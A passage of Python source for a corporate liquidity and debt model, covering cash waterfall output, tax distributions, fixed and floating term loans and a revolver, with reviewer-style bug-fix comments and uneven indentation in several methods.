        print (purchase_price[0], purchase_price[0] * equity_obj.debtPercentage, [item/1000000 for item in equity_annual_cashflow_list], irr, targeted_irr - irr)
        # df = liquidity_obj.metadata['cashflow'].copy()
        # global a
        # df['tlb_balance'] = pd.Series(tlb_object.principalBalances)
        # df.to_csv(str(a) + ".csv")
        # a+=1
        return targeted_irr - irr
    def __build_beginning_cash(self, cash_balances_df):
        """Seed 'Beginning Cash Balance' in the cashflow frame from DB balances.

        Each as_of_date is mapped to a begin_date via dateUtils; for every
        cashflow month that matches a begin_date, the first matching balance
        row is written into the frame. No-op when cash_balances_df is empty.
        """
        if len(cash_balances_df) > 0:
            cash_balances_df['begin_date'] = cash_balances_df.apply(lambda row: dateUtils.get_cash_balance_begin_date(row['as_of_date']), axis=1)
            for index, row in self.metadata['cashflow'].iterrows():
                if len(cash_balances_df.loc[cash_balances_df.begin_date == index]) > 0:
                    # iloc[0]: if several balances map to the same month, the first wins
                    self.metadata['cashflow'].at[index, 'Beginning Cash Balance'] = cash_balances_df.loc[cash_balances_df.begin_date == index].iloc[0]['balance']
def __initializ_fixed_asset_depreciation(self):
asset_df = dbLiquidity.get_asset_depreciation(self.portfolio)
entity_list = list(set(list(asset_df.entity)))
fixed_assets_obj_list = []
for entity in entity_list:
entity_asset_df = asset_df.loc[asset_df.entity==entity]
entity_name = entity
depreciation_method = entity_asset_df.iloc[0]['depreciation_method']
depreciation_term = entity_asset_df.iloc[0]['depreciation_term']
in_service_year = entity_asset_df.iloc[0]['in_service_year']
initial_purchase_price = entity_asset_df.loc[entity_asset_df.type == 'Purchase Price'].iloc[0]['value']
capex_df = entity_asset_df[entity_asset_df.type=='Capex']
grouped_capex_df = capex_df.groupby('in_service_year')['value'].sum()
capex_dict = grouped_capex_df.to_dict()
depreciation_adjustment_df = entity_asset_df[entity_asset_df.type.isin(['Disposal'])]
grouped_depreciation_adjustment_df = depreciation_adjustment_df.groupby('in_service_year')['value'].sum()
depreciation_adjustment_dict = grouped_depreciation_adjustment_df.to_dict()
fixed_asset_obj = FixedAsset(self.portfolio, entity_name, depreciation_method, depreciation_term, in_service_year, initial_purchase_price, capex=capex_dict, depreciation_adjustment=depreciation_adjustment_dict)
fixed_assets_obj_list.append(fixed_asset_obj)
return fixed_assets_obj_list
""" build up of PTD is differantiated between different portfolios, so this function has to provide different implementation """
    def __build_ptd(self, year, total_oid, total_ebitda, total_dfc, additional_capex_dict, total_interest_expense=None):
        """Build the permitted-tax-distribution (PTD) schedule for *year*.

        Sums tax depreciation across the portfolio's fixed assets and passes
        it with the supplied OID / EBITDA / DFC totals to the TaxRegister.
        Currently implemented only for the 'Lightstone' portfolio; any other
        portfolio falls through and returns None.

        Args:
            additional_capex_dict: {entity_name: {year: capex_total}} as built
                by analyze_liquidity.

        Returns:
            The TaxRegister's quarterly tax-payment schedule (or None).
        """
        """ step 1, get self tax register for the information like rate and split """
        tax_register_list = [item for item in self.capitalStructure if isinstance(item, TaxRegister)]
        fixed_assets_obj_list = self.fixedAssets
        if self.portfolio == 'Lightstone':
            tax_register = tax_register_list[0]
            tax_register.get_paid_tax_from_db(self.scenarioMaster.forecastStartMonth)
            # year = 2020
            # total_interest_expense = 112547000
            # total_oid = 5201000
            # total_ebitda = 214107000
            # total_dfc = 9536000
            # additional_capex_dict = {'Gavin':{2020:55145000, 2021:111111111}, .... }
            total_tax_depreciation = 0
            for fixed_asset in fixed_assets_obj_list:
                # entities without planned capex contribute an empty dict
                additional_capex = additional_capex_dict[fixed_asset.entityName] if fixed_asset.entityName in additional_capex_dict else {}
                total_tax_depreciation += fixed_asset.calcualte_tax_depreciation(additional_capex, year)
            ptd_schedule = tax_register.calculate_tax_payment(year, total_oid, total_ebitda, total_dfc, total_tax_depreciation, total_interest_expense)
            return ptd_schedule
def get_financials(self):
operating_company = [item for item in self.capitalStructure if isinstance(item, OperatingCompany)][0]
return operating_company.get_financials()
    def output_liquidity_results(self):
        """Assemble the report rows (annual and monthly) for the liquidity output.

        Builds financials rows ordered by the DB-configured row headers, then
        appends the cash-waterfall rows grouped by capital component.

        WARNING: this mutates self.metadata['cashflow'] in place — it fills
        NaNs with 0 and scales every column by 1e-6 ($ -> $mm), so it is not
        safe to call twice on the same instance.

        Returns:
            tuple: (annual_output_result_datarows, monthly_output_result_datarows),
            each a list of row lists ready for export.
        """
        monthly_list = self.metadata['cashflow'].index.tolist()
        financials_df = self.get_financials()
        rw_headers_df = self.get_output_row_headers_fromdb()
        """ step 1, get the ebitda related fslis """
        # row headers define both which fslis appear and their display order
        default_row_header = rw_headers_df.sort_values(by='order')['header'].tolist()
        financials_df = financials_df.loc[(financials_df.period.isin(monthly_list)) & (financials_df.fsli.isin(default_row_header))]
        merged_financials_df = pd.merge(financials_df, rw_headers_df, how='left', left_on='fsli', right_on = 'header')
        # display_sign flips fslis that are stored with the opposite sign
        merged_financials_df['display_value'] = merged_financials_df['value'] * merged_financials_df['display_sign']
        merged_financials_df = merged_financials_df[['fsli','period','display_value']]
        annual_financials_df = merged_financials_df.copy()
        annual_financials_df['year'] = annual_financials_df.apply(lambda row: row['period'].year, axis=1)
        pivot_financials_df = pd.pivot_table(merged_financials_df, index='fsli', values='display_value', columns='period', aggfunc='sum')
        pivot_financials_df.fillna(0.0, inplace=True)
        # reindex restores the configured row order lost by the pivot
        pivot_financials_df = pivot_financials_df.reindex(default_row_header)
        pivot_annual_financials_df = pd.pivot_table(annual_financials_df, index='fsli', values='display_value', columns='year', aggfunc='sum')
        pivot_annual_financials_df.fillna(0.0, inplace=True)
        pivot_annual_financials_df = pivot_annual_financials_df.reindex(default_row_header)
        # pivot_annual_financials_df.to_csv("pivot_annual_financials_df.csv")
        monthly_output_result_datarows = [['Financials $(mm)'] + [dateUtils.get_year_month_header(period_month) for period_month in monthly_list]]
        monthly_output_result_datarows = monthly_output_result_datarows + pivot_financials_df.reset_index().values.tolist()
        """ step 2, get the liquidity related fslis """
        cashflow_df = self.metadata['cashflow']
        cashflow_df.fillna(0.0, inplace=True)
        # scale dollars to $mm for display (mutates the shared frame in place)
        for column in cashflow_df.columns:
            cashflow_df[column] = cashflow_df[column] * 0.000001
        beginning_cash_datarow = cashflow_df['Beginning Cash Balance'].tolist()
        beginning_cash_datarow = ['Beginning Cash Balance'] + beginning_cash_datarow
        monthly_output_result_datarows.append([])
        monthly_output_result_datarows.append(beginning_cash_datarow)
        order_of_capital_component = ['OpCo', 'Revolver', 'TLB', 'TLC', 'Swap', 'TaxRegister', 'Equity']
        for capital_component in order_of_capital_component:
            monthly_output_result_datarows.append([capital_component])
            for column in cashflow_df.columns:
                # column naming convention '<Instrument> - <item>'
                if capital_component in column:
                    capital_component_sub_item = column.split(" - ")[1]
                    capital_component_sub_item_datarow = cashflow_df[column].values.tolist()
                    monthly_output_result_datarows.append([capital_component_sub_item] + capital_component_sub_item_datarow)
            monthly_output_result_datarows.append([])
        # monthly_output_result_datarows_df = pd.DataFrame(monthly_output_result_datarows)
        #
        # monthly_output_result_datarows_df.to_csv("monthly_output_result_datarows_df.csv")
        start_year = min(monthly_list).year
        end_year = max(monthly_list).year
        year_range = list(range(start_year, end_year+1))
        annual_output_result_datarows = [['Financials $(mm)'] + year_range]
        annual_output_result_datarows = annual_output_result_datarows + pivot_annual_financials_df.reset_index().values.tolist()
        annual_output_result_datarows.append([])
        annual_begining_cash_balance_datarow = ['Beginning Cash Balance']
        for year in year_range:
            # annual beginning cash is January's month-end row for that year
            beginning_cash = cashflow_df.loc[date(year,1,31)]['Beginning Cash Balance']
            annual_begining_cash_balance_datarow.append(beginning_cash)
        annual_output_result_datarows.append(annual_begining_cash_balance_datarow)
        for capital_component in order_of_capital_component:
            annual_output_result_datarows.append([capital_component])
            for column in cashflow_df.columns:
                if capital_component in column:
                    capital_component_sub_item = column.split(" - ")[1]
                    capital_component_sub_item_datarow = []
                    for year in year_range:
                        sub_item_value = cashflow_df.loc[date(year,1,31):date(year,12,31)][column].sum()
                        sub_item_value = 0.0 if str(sub_item_value) == 'nan' else sub_item_value
                        capital_component_sub_item_datarow.append(sub_item_value)
                    annual_output_result_datarows.append([capital_component_sub_item] + capital_component_sub_item_datarow)
            annual_output_result_datarows.append([])
        return annual_output_result_datarows, monthly_output_result_datarows
def get_output_row_headers_fromdb(self):
rw_headers_df = dbLiquidity.get_rw_headers()
return rw_headers_df
class OperatingCompany:
    """Operating company in the capital structure: holds EBITDA and capex
    series (by period) and derives cash flow from operations.

    Fix vs. original: the dict parameters used mutable default arguments
    ({}), which Python shares across every instance — mutating one
    instance's ebitda leaked into all others. Defaults are now None with a
    fresh dict created per instance (behavior otherwise unchanged).
    """
    def __init__(self,
                 portfolio,
                 financials_scenario='',
                 financials_version='',
                 financials_table='',
                 ebitda=None,
                 capex=None,
                 working_capital=None,
                 other_cash_use=None):
        """Initialize from explicit dicts, or load EBITDA/capex from the
        financials DB when both a scenario and a version are supplied.

        Args:
            portfolio (str): portfolio name, used for DB lookups.
            financials_scenario / financials_version / financials_table:
                DB selectors; when scenario and version are both non-empty the
                ebitda/capex dicts are loaded from the database instead.
            ebitda, capex, working_capital, other_cash_use (dict | None):
                {period: value} series; None means an empty, per-instance dict.
        """
        self.portfolio = portfolio
        self.financialsScenario = financials_scenario
        self.financialsVersion = financials_version
        self.financialsTable = financials_table
        # fresh dicts per instance (fixes the shared mutable-default bug)
        self.ebitda = {} if ebitda is None else ebitda
        self.capex = {} if capex is None else capex
        if financials_scenario != '' and financials_version != '':
            financials_df = self.get_financials()
            self.ebitda = financials_df.loc[financials_df.fsli=='EBITDA'].groupby(['fsli','period']).sum().reset_index()[['period','value']].set_index('period')['value'].to_dict()
            self.capex = financials_df.loc[financials_df.fsli=='Total Capex'].groupby(['fsli','period']).sum().reset_index()[['period','value']].set_index('period')['value'].to_dict()
            # some portfolios report 'Capex' instead of 'Total Capex'
            if 'Total Capex' not in financials_df.fsli.tolist():
                self.capex = financials_df.loc[financials_df.fsli=='Capex'].groupby(['fsli','period']).sum().reset_index()[['period','value']].set_index('period')['value'].to_dict()
        # """ flip the sign of the capex items """
        # for key, value in self.capex.items():
        #     self.capex[key] = -value
        self.workingCapital = {} if working_capital is None else working_capital
        self.otherCashUse = {} if other_cash_use is None else other_cash_use
    def get_financials(self):
        """Load this portfolio's financials DataFrame from the database."""
        financials_df = dbLiquidity.get_financials(self.portfolio, self.financialsScenario, self.financialsVersion, self.financialsTable)
        return financials_df
    def get_entity_capex(self):
        """Return per-entity capex rows ('Total Capex', falling back to 'Capex')."""
        financials_df = self.get_financials()
        entity_capex_df = financials_df.loc[financials_df.fsli=='Total Capex']
        if 'Total Capex' not in financials_df.fsli.tolist():
            entity_capex_df = financials_df.loc[financials_df.fsli=='Capex']
        return entity_capex_df
    def build_cfo(self):
        """Return {period: {'EBITDA', 'CAPEX', 'CFO'}} with CFO = EBITDA - capex.

        Periods missing from self.capex contribute zero capex.
        """
        cfo = {}
        for key in self.ebitda:
            ebitda = self.ebitda[key]
            capex = self.capex.get(key, 0)
            cfo[key] = {'EBITDA': ebitda, 'CAPEX': capex, 'CFO': ebitda - capex}
        return cfo
class Debt:
def __init__(self,
instrument_id,
issue_date,
maturity_date,
term,
initial_balance,
interest_start_date,
amort_start_date,
periodicity_months,
annual_scheduled_amort,
min_cash_reserve_prepay,
day_count='30/360',
sweep_percent=1,
dsra_months=6,
oids=[], # a list of OID objects
dfcs=[], # a list of DFC objects
oid_payments={},
dfc_payments={},
upsizes={},
prepays={},
effective_interest_rates={},
interest_payments={},
required_dsras={},
dsra_cash_movement={},
amortizations={},
principal_balances={},
flag_prepayable=True,
flag_historicals=True,
flag_dsra_fund_by_lc=True):
self.instrumentID = instrument_id # name of this debt
self.issueDate = issue_date
self.maturityDate = maturity_date
self.term = term
self.initialBalance = initial_balance
self.interestStartDate = interest_start_date
self.amortStartDate = amort_start_date
self.periodicityMonths = periodicity_months
self.dsraMonths = dsra_months
self.annualScheduledAmort = annual_scheduled_amort
self.minCashReservePrepay = min_cash_reserve_prepay
self.dayCount = day_count
self.sweepPercent = sweep_percent
self.effectiveInterestRates = effective_interest_rates
self.upsizes = upsizes
self.prepays = prepays
self.oids = oids
self.dfcs = dfcs
self.oidPayments = oid_payments
self.dfcPayments = dfc_payments
self.interestPayments = interest_payments
self.requiredDSRAs = required_dsras
self.dsraCashMovement = dsra_cash_movement
self.amortizations = amortizations
self.principalBalances = principal_balances
self.flagPrepayable = flag_prepayable
self.flagDsraFundByLc = flag_dsra_fund_by_lc
self.flagHistoricals = flag_historicals
def build_period_list(self):
period_list = []
if self.issueDate == date(self.issueDate.year, self.issueDate.month, monthrange(self.issueDate.year, self.issueDate.month)[-1]):
self.issueDate = self.issueDate + timedelta(days=1)
month_end = date(self.issueDate.year, self.issueDate.month, monthrange(self.issueDate.year, self.issueDate.month)[-1])
while month_end < self.maturityDate:
number_of_days_for_period = month_end.day
if month_end.year == self.issueDate.year and month_end.month == self.issueDate.month:
number_of_days_for_period = (month_end.day - self.issueDate.day) + 1
period_list.append([month_end, number_of_days_for_period])
else:
period_list.append([month_end, number_of_days_for_period])
month_end = month_end + timedelta(days=1)
month_end = date(month_end.year, month_end.month, monthrange(month_end.year, month_end.month)[-1])
if month_end >= self.maturityDate and month_end.year == self.maturityDate.year and month_end.month == self.maturityDate.month:
number_of_days_for_period = self.maturityDate.day
period_list.append([month_end, number_of_days_for_period])
return period_list
def build_principal_balances(self):
period_list = self.build_period_list()
for period_item in period_list:
month_end = period_item[0]
self.principalBalances[month_end] = 0.0
balance = self.initialBalance
upsize_balance = sum([self.upsizes[month] for month in self.upsizes if month <= month_end])
prepayment_balance = sum([self.prepays[month] for month in self.prepays if month <= month_end])
amortization_balance = sum([self.amortizations[month] for month in self.amortizations if month <= month_end])
balance += upsize_balance
balance -= prepayment_balance
balance -= amortization_balance
self.principalBalances[month_end] = balance
return self.principalBalances
def build_interest_payments(self, forecast_start):
period_list = self.build_period_list()
period_list = [item for item in period_list if item[0] >= forecast_start]
for period_item in period_list:
month_end = period_item[0]
effective_interest_rate = self.effectiveInterestRates[month_end]
balance = self.initialBalance
upsize_balance = sum([self.upsizes[month] for month in self.upsizes if month <= month_end])
prepayment_balance = sum([self.prepays[month] for month in self.prepays if month <= month_end])
balance += upsize_balance
balance -= prepayment_balance
self.interestPayments[month_end] = balance * effective_interest_rate * 30 / 360
if self.dayCount == 'day/365':
self.interestPayments[month_end] = balance * effective_interest_rate * month_end.day / 365
return self.interestPayments
def prepay_debt(self, forecast_month, forecast_start, prepayment):
if forecast_month in self.prepays:
self.prepays[forecast_month] = self.prepays[forecast_month] + prepayment
else:
self.prepays[forecast_month] = prepayment
self.build_principal_balances()
self.build_dsras(forecast_start)
def calculate_interest_expense(self, forecast_month):
balance = self.principalBalances[forecast_month]
effective_interest_rate = self.effectiveInterestRates[forecast_month]
number_of_days = forecast_month.day
interest_expense = balance * effective_interest_rate * number_of_days / 365
if self.dayCount == 'day/365':
interest_expense = balance * effective_interest_rate * number_of_days / 365
if self.dayCount == '30/360':
interest_expense = balance * effective_interest_rate * 30 / 360
number_of_days = 30
self.interestPayments[forecast_month] = interest_expense
return interest_expense
def calculate_amortization(self, forecast_month):
balance = self.initialBalance
annual_amort_amount = balance * self.annualScheduledAmort
periodicity = self.periodicityMonths
if forecast_month.month % periodicity != 0:
return 0
else:
amortization = annual_amort_amount / 12.0 * periodicity
if amortization > self.principalBalances[forecast_month]:
amortization = self.principalBalances[forecast_month]
self.amortizations[forecast_month] = amortization
self.build_principal_balances()
return amortization
""" method to calculate term loan prepayment based on available_cash """
def calculate_prepayment(self, forecast_month, available_cash):
if self.flagPrepayable == False:
""" if a debt is not prepayable, then return 0 """
self.prepays[forecast_month] = 0.0
return 0.0
if forecast_month.month % self.periodicityMonths != 0:
""" if period is not on periodicity, then return 0 """
self.prepays[forecast_month] = 0.0
return 0.0
prepay = available_cash if available_cash > 0 else 0.0
current_balance = self.principalBalances[forecast_month]
if prepay > current_balance:
prepay = current_balance
self.prepays[forecast_month] = prepay
self.build_principal_balances()
return prepay
# """ method to build term loan prepayment for lbo analysis """
# """ not designed for the liquidity purpose """
# def build_prepayments(self, forecast_start_month, available_cash):
# period_list = self.build_period_list()
# for period_month in period_list:
# if period_month[0] >= forecast_start_month:
# if period_month[0].month % self.period_month == 0:
# period_start = date(period_month[0].year, period_month[0] - self.periodicityMonths + 1, monthrange(period_month[0].year, period_month[0] - self.periodicityMonths + 1)[1])
# period_end = period_month[0]
# beginning_debt_balance = self.principalBalances[period_start]
# effective_interest_rates = {key:self.effectiveInterestRates[key] for key in self.effectiveInterestRates if key >= period_start and key <= period_end}
# available_cash = {key:available_cash[key] for key in available_cash if key >= period_start and key <= period_end}
def build_dsras(self, start_date):
    """Populate self.requiredDSRAs for every on-periodicity month-end from
    `start_date` onward.

    The required debt-service reserve is the next `dsraMonths` months of
    interest on the current balance (initial balance plus upsizes minus
    prepayments to date). Months beyond maturity use the maturity-date rate.

    BUG FIX: for 'day/365' day count the original added BOTH the 30/360 and
    the day/365 interest (two `+=` statements), double counting; sibling
    methods assign one or the other. Exactly one convention is applied now.
    The unused `next_six_months_list` accumulator was also removed.
    """
    for period_item in self.build_period_list():
        month_end = period_item[0]
        # quarterly : mod(3); semiannually : mod(6)
        if month_end < start_date or month_end.month % self.periodicityMonths != 0:
            continue
        start_debt_balance = (self.initialBalance
                              - sum(v for m, v in self.prepays.items() if m <= month_end)
                              + sum(v for m, v in self.upsizes.items() if m <= month_end))
        required_interest = 0.0
        next_month = month_end
        for _ in range(self.dsraMonths):
            next_month = next_month + timedelta(days=1)
            next_month = date(next_month.year, next_month.month,
                              monthrange(next_month.year, next_month.month)[1])
            # if the month exceeds the available forecast period, use the last one
            interest_month = min(next_month, self.maturityDate)
            rate = self.effectiveInterestRates[interest_month]
            if self.dayCount == 'day/365':
                required_interest += start_debt_balance * rate * next_month.day / 365
            else:
                required_interest += start_debt_balance * rate * 30 / 360
        self.requiredDSRAs[month_end] = required_interest
        # if the DSRA is funded by a letter of credit, no cash moves
        if self.flagDsraFundByLc:
            self.dsraCashMovement[month_end] = 0.0
def set_historical_amortization(self, forecast_start_month, debt_activity_df=None):
    """Load pre-forecast amortization history into self.amortizations.

    No-op unless self.flagHistoricals is truthy. When `debt_activity_df`
    is not supplied it is fetched from the liquidity database.

    (Cleanup: removed the no-op `df['value'] = df['value']` assignment and
    the now-unneeded `.copy()`.)
    """
    if not self.flagHistoricals:
        return
    if debt_activity_df is None:
        debt_activity_df = dbLiquidity.get_debt_activity(self.instrumentID)
    mask = ((debt_activity_df.instrument_id == self.instrumentID)
            & (debt_activity_df.activity_type == 'amortization')
            & (debt_activity_df.date < forecast_start_month))
    self.amortizations = debt_activity_df.loc[mask].set_index('date')['value'].to_dict()
def set_historical_size_change(self, forecast_start_month, debt_activity_df=None):
    """Load historical upsizes (additional borrowings) and prepayments.

    Dates are normalized to month-end. Returns
    (self.upsizes, self.prepays, debt_activity_df).

    (Cleanup: removed the no-op `prepay_df['value'] = prepay_df['value']`.)
    """
    if self.flagHistoricals:
        if debt_activity_df is None:
            debt_activity_df = dbLiquidity.get_debt_activity(self.instrumentID)
        """ load debt upsize information """
        upsizes_df = debt_activity_df.loc[(debt_activity_df.activity_type == 'additional borrowing')
                                          & (debt_activity_df.date < forecast_start_month)][['date', 'value']].copy()
        if len(upsizes_df) > 0:
            upsizes_df['date'] = upsizes_df.apply(
                lambda row: date(row['date'].year, row['date'].month,
                                 monthrange(row['date'].year, row['date'].month)[1]), axis=1)
            self.upsizes = upsizes_df.set_index('date')['value'].to_dict()
        else:
            self.upsizes = {}
        """ load debt prepayment information """
        # NOTE(review): unlike the upsizes above, prepayments are NOT
        # filtered to dates before forecast_start_month -- presumably so
        # known future prepayments are kept, but confirm against callers.
        prepay_df = debt_activity_df.loc[debt_activity_df.activity_type == 'prepayment'][['date', 'value']].copy()
        if len(prepay_df) > 0:
            prepay_df['date'] = prepay_df.apply(
                lambda row: date(row['date'].year, row['date'].month,
                                 monthrange(row['date'].year, row['date'].month)[1]), axis=1)
            self.prepays = prepay_df.set_index('date')['value'].to_dict()
        else:
            self.prepays = {}
    return self.upsizes, self.prepays, debt_activity_df
def set_historical_interest_payments(self, forecast_start_month, debt_activity_df=None):
    """Load pre-forecast interest-expense history into self.interestPayments.

    Expense values are sign-flipped so payments are stored as positives.
    Returns the (possibly updated) payment map.
    """
    if self.flagHistoricals:
        if debt_activity_df is None:
            debt_activity_df = dbLiquidity.get_debt_activity(self.instrumentID)
        mask = ((debt_activity_df.instrument_id == self.instrumentID)
                & (debt_activity_df.activity_type == 'interest expense')
                & (debt_activity_df.date < forecast_start_month))
        history = debt_activity_df.loc[mask].copy()
        history['value'] = -history['value']
        self.interestPayments = history.set_index('date')['value'].to_dict()
    return self.interestPayments
def build_amortizations(self, forecast_start_month):
    """Schedule the periodic amortization installment for every
    on-periodicity month-end on/after `forecast_start_month`; returns the
    (updated) amortization map."""
    installment = self.initialBalance * self.annualScheduledAmort / 12.0 * self.periodicityMonths
    for period_item in self.build_period_list():
        month_end = period_item[0]
        if month_end >= forecast_start_month and month_end.month % self.periodicityMonths == 0:
            self.amortizations[month_end] = installment
    return self.amortizations
class FixedDebt(Debt):
    """Debt instrument carrying a single fixed coupon for its whole life."""

    def __init__(self,
                 fixed_rate,
                 instrument_id,
                 issue_date,
                 maturity_date,
                 term,
                 initial_balance,
                 interest_start_date,
                 amort_start_date,
                 periodicity_months,
                 annual_scheduled_amort,
                 min_cash_reserve_prepay,
                 day_count='30/360',
                 sweep_percent=1,
                 dsra_months=6,
                 oids=None,                      # list of OID objects
                 dfcs=None,                      # list of DFC objects
                 oid_payments=None,
                 dfc_payments=None,
                 upsizes=None,
                 prepays=None,
                 effective_interest_rates=None,
                 interest_payments=None,
                 required_dsras=None,
                 dsra_cash_movement=None,
                 amortizations=None,
                 principal_balances=None,
                 flag_prepayable=True,
                 flag_historicals=True,
                 flag_dsra_fund_by_lc=True):
        # BUG FIX: the container defaults used to be literal []/{} objects,
        # which Python shares between every call -- so all instances built
        # with defaults shared the same prepays/upsizes/... containers.
        # None sentinels give each instance fresh containers.
        Debt.__init__(self,
                      instrument_id,
                      issue_date,
                      maturity_date,
                      term,
                      initial_balance,
                      interest_start_date,
                      amort_start_date,
                      periodicity_months,
                      annual_scheduled_amort,
                      min_cash_reserve_prepay,
                      day_count,
                      sweep_percent,
                      dsra_months,
                      [] if oids is None else oids,
                      [] if dfcs is None else dfcs,
                      {} if oid_payments is None else oid_payments,
                      {} if dfc_payments is None else dfc_payments,
                      {} if upsizes is None else upsizes,
                      {} if prepays is None else prepays,
                      {} if effective_interest_rates is None else effective_interest_rates,
                      {} if interest_payments is None else interest_payments,
                      {} if required_dsras is None else required_dsras,
                      {} if dsra_cash_movement is None else dsra_cash_movement,
                      {} if amortizations is None else amortizations,
                      {} if principal_balances is None else principal_balances,
                      flag_prepayable,
                      flag_historicals,
                      flag_dsra_fund_by_lc)
        self.fixedRate = fixed_rate

    def set_effective_interest_rates(self):
        """Assign the fixed coupon to every period end; returns the rate map."""
        period_list = Debt.build_period_list(self)
        for month in period_list:
            self.effectiveInterestRates[month[0]] = self.fixedRate
        return self.effectiveInterestRates
# TLB TLC
class FloatingDebt(Debt):
    """Floating-rate debt (e.g. a TLB/TLC): effective rate = index fixing + margin."""

    def __init__(self,
                 margins,  # margin schedule rows: [rate, start_date, end_date]
                 index,    # index instrument id used to look up fixings
                 instrument_id,
                 issue_date,
                 maturity_date,
                 term,
                 initial_balance,
                 interest_start_date,
                 amort_start_date,
                 periodicity_months,
                 annual_scheduled_amort,
                 min_cash_reserve_prepay,
                 day_count='30/360',
                 sweep_percent=1,
                 dsra_months=6,
                 oids=None,                      # list of OID objects
                 dfcs=None,                      # list of DFC objects
                 oid_payments=None,
                 dfc_payments=None,
                 upsizes=None,
                 prepays=None,
                 effective_interest_rates=None,
                 interest_payments=None,
                 required_dsras=None,
                 dsra_cash_movement=None,
                 amortizations=None,
                 principal_balances=None,
                 flag_prepayable=True,
                 flag_historicals=True):
        # BUG FIX: literal []/{} defaults are shared across every call in
        # Python; None sentinels give each instance its own containers.
        Debt.__init__(self,
                      instrument_id,
                      issue_date,
                      maturity_date,
                      term,
                      initial_balance,
                      interest_start_date,
                      amort_start_date,
                      periodicity_months,
                      annual_scheduled_amort,
                      min_cash_reserve_prepay,
                      day_count,
                      sweep_percent,
                      dsra_months,
                      [] if oids is None else oids,
                      [] if dfcs is None else dfcs,
                      {} if oid_payments is None else oid_payments,
                      {} if dfc_payments is None else dfc_payments,
                      {} if upsizes is None else upsizes,
                      {} if prepays is None else prepays,
                      {} if effective_interest_rates is None else effective_interest_rates,
                      {} if interest_payments is None else interest_payments,
                      {} if required_dsras is None else required_dsras,
                      {} if dsra_cash_movement is None else dsra_cash_movement,
                      {} if amortizations is None else amortizations,
                      {} if principal_balances is None else principal_balances,
                      flag_prepayable,
                      flag_historicals)
        self.index = index
        self.margins = margins

    def set_effective_interest_rates(self, index_df, forecast_start, floor=None):
        """Build effective rates for period ends >= forecast_start.

        The fixing is the index value shifted forward one month (prior-month
        rate applies), plus the sum of margins whose window covers the month.
        `floor`, when given, is the minimum index rate before margins.
        """
        # .copy() so the adjusted_period column is not written into the
        # caller's frame (and to avoid chained-assignment warnings).
        index_df = index_df.loc[index_df.instrument_id == self.index].copy()
        index_df['adjusted_period'] = index_df.apply(
            lambda row: dateUtils.get_one_month_later(row['period']), axis=1)
        period_list = [period for period in Debt.build_period_list(self)
                       if period[0] >= forecast_start]
        for period_month in period_list:
            month_end = period_month[0]
            floating_interest_rate = index_df.loc[index_df.adjusted_period == month_end].iloc[0]['value']
            margin = sum(float(margin_item[0]) for margin_item in self.margins
                         if margin_item[1] <= month_end <= margin_item[2])
            if floor is not None:
                # BUG FIX: the clamp was hard-coded to 0.01 and ignored the
                # caller-supplied floor value.
                floating_interest_rate = floor if floating_interest_rate < floor else floating_interest_rate
            self.effectiveInterestRates[month_end] = floating_interest_rate + margin
# Revolver
class Revolver(FloatingDebt):
    """Revolving credit facility.

    Draws may occur in any month; repayments only on periodicity (e.g.
    quarter-end) months. The inherited upsizes/prepays maps are reused as
    draws/repayments. No scheduled amortization, OID, DFC, or DSRA applies.
    """

    def __init__(self,
                 credit_line,                # maximum facility capacity
                 min_cash_reserve_revolver,  # cash floor used when sizing a draw
                 margins,                    # floating margin schedule
                 index,                      # floating index instrument id
                 instrument_id,
                 issue_date,
                 maturity_date,
                 term,
                 initial_balance,
                 interest_start_date,
                 amort_start_date,           # unused: revolvers do not amortize
                 periodicity_months,
                 annual_scheduled_amort,     # 0 for revolvers
                 min_cash_reserve_prepay,
                 day_count='30/360',
                 sweep_percent=1,            # unused by revolver
                 dsra_months=6,              # unused by revolver
                 oids=None,                  # unused by revolver
                 dfcs=None,                  # unused by revolver
                 oid_payments=None,
                 dfc_payments=None,
                 upsizes=None,               # revolver draws
                 prepays=None,               # revolver repayments
                 effective_interest_rates=None,
                 interest_payments=None,
                 required_dsras=None,        # unused by revolver
                 dsra_cash_movement=None,
                 amortizations=None,
                 principal_balances=None,
                 flag_prepayable=True,       # "prepay" = repay remaining balance
                 flag_historicals=True):     # kept True to get life-to-date balance
        # BUG FIX: literal []/{} defaults are shared across every call in
        # Python; None sentinels give each instance its own containers.
        FloatingDebt.__init__(self,
                              margins,
                              index,
                              instrument_id,
                              issue_date,
                              maturity_date,
                              term,
                              initial_balance,
                              interest_start_date,
                              amort_start_date,
                              periodicity_months,
                              annual_scheduled_amort,
                              min_cash_reserve_prepay,
                              day_count,
                              sweep_percent,
                              dsra_months,
                              [] if oids is None else oids,
                              [] if dfcs is None else dfcs,
                              {} if oid_payments is None else oid_payments,
                              {} if dfc_payments is None else dfc_payments,
                              {} if upsizes is None else upsizes,
                              {} if prepays is None else prepays,
                              {} if effective_interest_rates is None else effective_interest_rates,
                              {} if interest_payments is None else interest_payments,
                              {} if required_dsras is None else required_dsras,
                              {} if dsra_cash_movement is None else dsra_cash_movement,
                              {} if amortizations is None else amortizations,
                              {} if principal_balances is None else principal_balances,
                              flag_prepayable,
                              flag_historicals)
        self.creditLine = credit_line
        self.minCashReserveRevolver = min_cash_reserve_revolver

    def build_revolver_draw(self, ending_cash_balances):
        """Schedule a draw for every month whose projected ending cash is
        negative, sized to restore the minimum cash reserve.

        A draw is only added when the month (1) has negative cash, (2) is
        not a repayment (quarter-end) month, and (3) has no predefined draw.
        """
        for period, ending_cash_balance in ending_cash_balances.items():
            if (ending_cash_balance < 0
                    and period.month % self.periodicityMonths != 0
                    and self.upsizes.get(period, 0) == 0):
                # BUG FIXES: (1) the original referenced the nonexistent
                # attribute `self.min_cash_reserve_revolver` (it is
                # minCashReserveRevolver), raising AttributeError;
                # (2) `self.upsizes[period] != 0` raised KeyError for months
                # with no entry and contradicted the stated intent of drawing
                # only when no draw is predefined.
                self.upsizes[period] = self.minCashReserveRevolver - ending_cash_balance
        return self.upsizes

    def set_historical_revolver_change(self, forecast_start_month):
        """Load pre-forecast draws/repayments from the liquidity database,
        normalized to month-end dates. Returns (draws, repayments)."""
        if self.flagHistoricals is True:
            revolver_activity_df = dbLiquidity.get_debt_activity(self.instrumentID)
            # .copy() so the date normalization below writes to an owned
            # frame instead of a chained-indexing view.
            upsizes_df = revolver_activity_df.loc[(revolver_activity_df.activity_type == 'draw')
                                                  & (revolver_activity_df.date < forecast_start_month)][['date', 'value']].copy()
            prepays_df = revolver_activity_df.loc[(revolver_activity_df.activity_type == 'repay')
                                                  & (revolver_activity_df.date < forecast_start_month)][['date', 'value']].copy()
            upsizes_df['date'] = upsizes_df.apply(
                lambda row: date(row['date'].year, row['date'].month,
